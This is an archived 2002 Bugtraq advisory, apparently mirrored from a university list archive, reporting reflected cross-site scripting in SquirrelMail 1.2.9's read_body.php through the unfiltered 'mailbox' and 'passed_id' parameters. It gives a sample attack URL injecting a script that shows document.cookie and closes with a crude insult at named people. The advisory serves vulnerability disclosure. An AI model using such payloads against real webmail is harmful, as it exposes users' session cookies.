[28092] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

SquirrelMail v1.2.9 XSS bugs

daemon@ATHENA.MIT.EDU (euronymous)
Tue Dec 3 14:12:34 2002

Date: 	Tue, 3 Dec 2002 07:28:14 +0300 (MSK)
From: "euronymous" <just-a-user@yandex.ru>
Reply-To: just-a-user@yandex.ru
Message-Id: <3DEC32DE.000006.06408@ariel.yandex.ru>
MIME-Version: 1.0
Errors-To: just-a-user@yandex.ru
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Content-Type: text/plain;
  charset="US-ASCII"
Content-Transfer-Encoding: 7bit

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
	      
description
-----------
when reading some email you can to insert the scripting code..
read_body.php dont make filtering users input in `mailbox' and
`passed_id' variables. btw, today has released v1.2.10. im dont
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

not URL-encoded string working fine also.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28092] in bugtraq

SquirrelMail v1.2.9 XSS bugs

daemon@ATHENA.MIT.EDU (euronymous)Tue Dec 3 14:12:34 2002

daemon@ATHENA.MIT.EDU (euronymous)
Tue Dec 3 14:12:34 2002